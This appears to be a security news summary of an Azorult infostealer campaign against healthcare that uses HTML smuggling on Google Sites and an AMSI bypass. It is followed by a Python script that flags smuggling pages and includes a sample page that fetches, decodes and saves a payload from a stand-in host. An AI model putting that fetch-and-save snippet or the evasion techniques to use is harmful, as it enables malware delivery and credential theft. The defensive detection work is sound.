TLDR:
– An Azorult malware campaign uses HTML smuggling via Google Sites to steal login credentials.
– Attackers deliver a malicious JSON payload from an external website and evade detection with reflective code loading and an AMSI bypass.
A new evasive Azorult campaign has been identified that uses HTML smuggling to deliver a malicious JSON payload from an external website. The campaign targets the healthcare industry and aims to steal sensitive information, including login credentials, crypto wallet data, and browser data. The attackers abuse Google Sites to host the HTML smuggling page, while the base64-encoded payload itself sits in a separate JSON file hosted on a different domain. When victims visit the site, their browser fetches, decodes, and saves the malicious payload locally without their knowledge. Reflective code loading and an AMSI bypass are then used to evade detection by antivirus software.

The Azorult malware, a .NET infostealer, collects sensitive user data such as credentials, browser data, and crypto wallet information. Sensitive documents are selected by file extension and keyword, and the collected data is compressed, encrypted with Curve25519, and exfiltrated to the command and control server over HTTP. Overall, this campaign demonstrates the sophisticated techniques attackers use to steal valuable information from their victims.
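As an added example (not part of the original summary or the underlying report), the following Python script scores an HTML page for the smuggling pattern described above: a fetch of a JSON file from a different domain, base64 decoding in the browser, and a Blob turned into a forced download. The indicator names, threshold, sample pages and the host name `payload-host.example` are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Heuristic indicators of HTML smuggling (constructed list, not from the report).
INDICATORS = {
    "base64_decode": r"\batob\s*\(",
    "blob_construct": r"\bnew\s+Blob\s*\(",
    "object_url": r"createObjectURL\s*\(",
    "forced_download": r"\.download\s*=",
    "external_json_fetch": r"fetch\s*\(\s*['\"]https?://[^'\"]+\.json['\"]",
}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def score_html(html: str) -> set:
    """Return the set of indicator names found in the page source."""
    return {name for name, pat in INDICATORS.items() if re.search(pat, html)}


def external_hosts(html: str, page_host: str) -> set:
    """Hosts referenced by the page other than the host serving it
    (the report describes the JSON payload living on a separate domain)."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(html)}
    return {h for h in hosts if h and h.lower() != page_host.lower()}


def is_suspicious(html: str, threshold: int = 3) -> bool:
    """Flag a page when several indicators co-occur; a single atob() is common
    in benign pages, so one hit alone is not enough."""
    return len(score_html(html)) >= threshold


# Constructed sample: the smuggling pattern from the summary (decode-and-save only).
SMUGGLING_PAGE = """<html><body><script>
fetch("https://payload-host.example/data.json").then(r => r.json()).then(j => {
  const bytes = Uint8Array.from(atob(j.d), c => c.charCodeAt(0));
  const a = document.createElement("a");
  a.href = URL.createObjectURL(new Blob([bytes]));
  a.download = "report.pdf";
});
</script></body></html>"""

# Constructed benign sample: uses atob() for a config string, no download logic.
BENIGN_PAGE = """<html><body><script>
const cfg = JSON.parse(atob("eyJ0aGVtZSI6ImRhcmsifQ=="));
document.body.className = cfg.theme;
</script></body></html>"""

if __name__ == "__main__":
    print("smuggling page:", sorted(score_html(SMUGGLING_PAGE)), is_suspicious(SMUGGLING_PAGE))
    print("benign page:", sorted(score_html(BENIGN_PAGE)), is_suspicious(BENIGN_PAGE))
```

In practice the page host would come from the URL being inspected (here the report's Google Sites case) and the external host set would be compared against an allow list.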